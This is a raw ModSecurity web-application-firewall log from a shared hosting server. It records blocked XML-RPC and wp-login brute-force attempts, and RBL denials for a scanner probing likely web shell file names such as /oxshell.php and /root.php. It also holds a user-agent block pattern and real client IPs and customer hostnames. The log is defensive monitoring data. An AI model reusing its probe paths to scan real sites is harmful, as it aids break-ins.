[Tue May 26 19:26:35.552839 2026] [security2:error] [pid 49598:tid 49743] [client 91.245.236.124:29279] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmk-zJzkdc0WtdrwtQdgAAAJQ"]
[Tue May 26 19:26:35.645307 2026] [security2:error] [pid 49598:tid 49641] [remote 38.95.35.74:34244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmk-zJzkdc0WtdrwtQcQAA1So"]
[Tue May 26 19:26:36.333572 2026] [security2:error] [pid 49598:tid 49747] [client 91.245.236.124:35819] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmlOzJzkdc0WtdrwtQiQAAAJg"]
[Tue May 26 19:26:36.333717 2026] [security2:error] [pid 49598:tid 49747] [client 91.245.236.124:35819] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmlOzJzkdc0WtdrwtQiQAAAJg"]
[Tue May 26 19:26:36.463185 2026] [security2:error] [pid 49598:tid 49765] [client 20.192.3.167:14406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/new.php"] [unique_id "ahWmlOzJzkdc0WtdrwtQjQAAAKo"]
[Tue May 26 19:26:37.111958 2026] [security2:error] [pid 49598:tid 49756] [client 91.245.236.124:41223] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmlezJzkdc0WtdrwtQpQAAAKE"]
[Tue May 26 19:26:37.112056 2026] [security2:error] [pid 49598:tid 49756] [client 91.245.236.124:41223] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmlezJzkdc0WtdrwtQpQAAAKE"]
[Tue May 26 19:26:37.157856 2026] [security2:error] [pid 49598:tid 49660] [remote 38.95.35.74:34244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmlezJzkdc0WtdrwtQogAA_T0"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:26:37.532779 2026] [security2:error] [pid 49598:tid 49744] [client 20.192.3.167:6212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/0x.php"] [unique_id "ahWmlezJzkdc0WtdrwtQrAAAAJU"]
[Tue May 26 19:26:37.877545 2026] [security2:error] [pid 49598:tid 49788] [client 91.245.236.124:41163] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmlezJzkdc0WtdrwtQsAAAAME"]
[Tue May 26 19:26:37.877684 2026] [security2:error] [pid 49598:tid 49788] [client 91.245.236.124:41163] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmlezJzkdc0WtdrwtQsAAAAME"]
[Tue May 26 19:26:38.463833 2026] [security2:error] [pid 49598:tid 49778] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmluzJzkdc0WtdrwtQtgAAALc"]
[Tue May 26 19:26:38.605608 2026] [security2:error] [pid 49598:tid 49789] [client 20.192.3.167:8754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/0.php"] [unique_id "ahWmluzJzkdc0WtdrwtQvwAAAMI"]
[Tue May 26 19:26:38.654835 2026] [security2:error] [pid 49598:tid 49792] [client 91.245.236.124:63273] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmluzJzkdc0WtdrwtQwgAAAMU"]
[Tue May 26 19:26:38.654987 2026] [security2:error] [pid 49598:tid 49792] [client 91.245.236.124:63273] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmluzJzkdc0WtdrwtQwgAAAMU"]
[Tue May 26 19:26:38.672930 2026] [security2:error] [pid 49598:tid 49766] [client 102.164.188.174:31954] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "erp.azurmediatec.com"] [uri "/salaries/card.php"] [unique_id "ahWmluzJzkdc0WtdrwtQvgAAq0I"], referer: https://erp.azurmediatec.com/salaries/card.php?action=create&fk_project=0&accountid=1&paymenttype=2&datepday=18&datepmonth=3&datepyear=2026
[Tue May 26 19:26:39.434138 2026] [security2:error] [pid 49598:tid 49811] [client 91.245.236.124:25859] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWml-zJzkdc0WtdrwtQ3gAAANg"]
[Tue May 26 19:26:39.434296 2026] [security2:error] [pid 49598:tid 49811] [client 91.245.236.124:25859] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWml-zJzkdc0WtdrwtQ3gAAANg"]
[Tue May 26 19:26:39.694975 2026] [security2:error] [pid 49598:tid 49775] [client 20.192.3.167:8725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/oxshell.php"] [unique_id "ahWml-zJzkdc0WtdrwtQ6wAAALQ"]
[Tue May 26 19:26:40.209052 2026] [security2:error] [pid 49598:tid 49818] [client 91.245.236.124:55543] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmmOzJzkdc0WtdrwtQ8AAAAN8"]
[Tue May 26 19:26:40.209147 2026] [security2:error] [pid 49598:tid 49818] [client 91.245.236.124:55543] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmmOzJzkdc0WtdrwtQ8AAAAN8"]
[Tue May 26 19:26:40.599768 2026] [security2:error] [pid 49598:tid 49663] [remote 123.30.233.13:50568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahWmmOzJzkdc0WtdrwtRAAAAh0A"]
[Tue May 26 19:26:40.782969 2026] [security2:error] [pid 49598:tid 49731] [client 20.192.3.167:9080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/php8.php"] [unique_id "ahWmmOzJzkdc0WtdrwtREQAAAIg"]
[Tue May 26 19:26:40.987367 2026] [security2:error] [pid 49598:tid 49832] [client 91.245.236.124:20161] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmmOzJzkdc0WtdrwtREgAAAO0"]
[Tue May 26 19:26:40.987493 2026] [security2:error] [pid 49598:tid 49832] [client 91.245.236.124:20161] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmmOzJzkdc0WtdrwtREgAAAO0"]
[Tue May 26 19:26:41.027471 2026] [security2:error] [pid 49598:tid 49728] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmmOzJzkdc0WtdrwtRBgAAAIU"]
[Tue May 26 19:26:41.606947 2026] [security2:error] [pid 49598:tid 49661] [remote 123.30.233.13:50568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahWmmezJzkdc0WtdrwtRIgAAvj4"], referer: https://nicmaperu.com/wp-login.php
[Tue May 26 19:26:41.763447 2026] [security2:error] [pid 49598:tid 49775] [client 91.245.236.124:48281] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmmezJzkdc0WtdrwtRJgAAALQ"]
[Tue May 26 19:26:41.763560 2026] [security2:error] [pid 49598:tid 49775] [client 91.245.236.124:48281] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmmezJzkdc0WtdrwtRJgAAALQ"]
[Tue May 26 19:26:41.806997 2026] [security2:error] [pid 49598:tid 49762] [client 85.208.96.201:65270] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWmmezJzkdc0WtdrwtRLQAAAKc"]
[Tue May 26 19:26:41.807153 2026] [security2:error] [pid 49598:tid 49762] [client 85.208.96.201:65270] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWmmezJzkdc0WtdrwtRLQAAAKc"]
[Tue May 26 19:26:41.927106 2026] [security2:error] [pid 49598:tid 49788] [client 20.192.3.167:1624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/p.php"] [unique_id "ahWmmezJzkdc0WtdrwtRMQAAAME"]
[Tue May 26 19:26:42.291058 2026] [security2:error] [pid 49598:tid 49671] [remote 103.216.116.57:54784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.116.216.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWmmuzJzkdc0WtdrwtRNQAAskg"]
[Tue May 26 19:26:42.523548 2026] [security2:error] [pid 49598:tid 49768] [client 91.245.236.124:50523] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmmuzJzkdc0WtdrwtRQAAAAK0"]
[Tue May 26 19:26:42.523687 2026] [security2:error] [pid 49598:tid 49768] [client 91.245.236.124:50523] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmmuzJzkdc0WtdrwtRQAAAAK0"]
[Tue May 26 19:26:43.000479 2026] [security2:error] [pid 49598:tid 49794] [client 20.192.3.167:14426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/php.php"] [unique_id "ahWmmuzJzkdc0WtdrwtRTgAAAMc"]
[Tue May 26 19:26:43.285491 2026] [security2:error] [pid 49598:tid 49742] [client 91.245.236.124:18075] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmm-zJzkdc0WtdrwtRVAAAAJM"]
[Tue May 26 19:26:43.285656 2026] [security2:error] [pid 49598:tid 49742] [client 91.245.236.124:18075] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmm-zJzkdc0WtdrwtRVAAAAJM"]
[Tue May 26 19:26:43.445405 2026] [security2:error] [pid 49598:tid 49807] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmmuzJzkdc0WtdrwtRTAAAANQ"]
[Tue May 26 19:26:43.606697 2026] [security2:error] [pid 49598:tid 49676] [remote 5.42.158.148:49918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWmm-zJzkdc0WtdrwtRWAAA6k0"]
[Tue May 26 19:26:44.050503 2026] [security2:error] [pid 49598:tid 49732] [client 91.245.236.124:37731] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmnOzJzkdc0WtdrwtRbwAAAIk"]
[Tue May 26 19:26:44.050656 2026] [security2:error] [pid 49598:tid 49732] [client 91.245.236.124:37731] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmnOzJzkdc0WtdrwtRbwAAAIk"]
[Tue May 26 19:26:44.178574 2026] [security2:error] [pid 49598:tid 49769] [client 20.192.3.167:6534] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/past.php"] [unique_id "ahWmnOzJzkdc0WtdrwtRdgAAAK4"]
[Tue May 26 19:26:44.338700 2026] [security2:error] [pid 49598:tid 49670] [remote 51.161.197.178:37152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.197.161.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmnOzJzkdc0WtdrwtRdAAAw0c"]
[Tue May 26 19:26:44.353716 2026] [security2:error] [pid 49598:tid 49643] [remote 113.190.40.93:39250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWmnOzJzkdc0WtdrwtRdQAAjiw"]
[Tue May 26 19:26:44.394818 2026] [security2:error] [pid 49598:tid 49677] [remote 208.109.188.137:53470] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWmnOzJzkdc0WtdrwtRegAAu04"], referer: https://vcresco.com/wp-login.php
[Tue May 26 19:26:44.516500 2026] [security2:error] [pid 49598:tid 49798] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmnOzJzkdc0WtdrwtRcgAAAMs"]
[Tue May 26 19:26:44.830097 2026] [security2:error] [pid 49598:tid 49779] [client 91.245.236.124:48591] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmnOzJzkdc0WtdrwtRjQAAALg"]
[Tue May 26 19:26:44.830228 2026] [security2:error] [pid 49598:tid 49779] [client 91.245.236.124:48591] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmnOzJzkdc0WtdrwtRjQAAALg"]
[Tue May 26 19:26:44.880154 2026] [security2:error] [pid 49598:tid 49688] [remote 51.161.197.178:37152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.197.161.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmnOzJzkdc0WtdrwtRjgAAs1k"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:26:45.177972 2026] [security2:error] [pid 49598:tid 49832] [client 20.192.3.167:8326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/root.php"] [unique_id "ahWmnezJzkdc0WtdrwtRmwAAAO0"]
[Tue May 26 19:26:45.327836 2026] [security2:error] [pid 49598:tid 49683] [remote 143.244.182.226:37254] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.182.244.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/wp-login.php"] [unique_id "ahWmnezJzkdc0WtdrwtRmAAA_1Q"]
[Tue May 26 19:26:45.606549 2026] [security2:error] [pid 49598:tid 49751] [client 91.245.236.124:22795] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmnezJzkdc0WtdrwtRqgAAAJw"]
[Tue May 26 19:26:45.606664 2026] [security2:error] [pid 49598:tid 49751] [client 91.245.236.124:22795] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmnezJzkdc0WtdrwtRqgAAAJw"]
[Tue May 26 19:26:46.255410 2026] [security2:error] [pid 49598:tid 49786] [client 20.192.3.167:14420] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/r.php"] [unique_id "ahWmnuzJzkdc0WtdrwtRuAAAAL8"]
[Tue May 26 19:26:46.368935 2026] [security2:error] [pid 49598:tid 49849] [client 91.245.236.124:18653] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmnuzJzkdc0WtdrwtRvAAAAP4"]
[Tue May 26 19:26:46.369051 2026] [security2:error] [pid 49598:tid 49849] [client 91.245.236.124:18653] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmnuzJzkdc0WtdrwtRvAAAAP4"]
[Tue May 26 19:26:47.225398 2026] [security2:error] [pid 49598:tid 49841] [client 91.245.236.124:9883] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmn-zJzkdc0WtdrwtR1gAAAPY"]
[Tue May 26 19:26:47.225517 2026] [security2:error] [pid 49598:tid 49841] [client 91.245.236.124:9883] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmn-zJzkdc0WtdrwtR1gAAAPY"]
[Tue May 26 19:26:47.304063 2026] [security2:error] [pid 49598:tid 49818] [client 20.192.3.167:10180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/sid3.php"] [unique_id "ahWmn-zJzkdc0WtdrwtR2gAAAN8"]
[Tue May 26 19:26:47.569586 2026] [security2:error] [pid 49598:tid 49702] [remote 5.42.158.148:49918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWmn-zJzkdc0WtdrwtR3QAA3Gc"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:26:47.711257 2026] [security2:error] [pid 49598:tid 49797] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmn-zJzkdc0WtdrwtR2QAAAMo"]
[Tue May 26 19:26:47.987142 2026] [security2:error] [pid 49598:tid 49847] [client 91.245.236.124:24589] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmn-zJzkdc0WtdrwtR8QAAAPw"]
[Tue May 26 19:26:47.987272 2026] [security2:error] [pid 49598:tid 49847] [client 91.245.236.124:24589] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmn-zJzkdc0WtdrwtR8QAAAPw"]
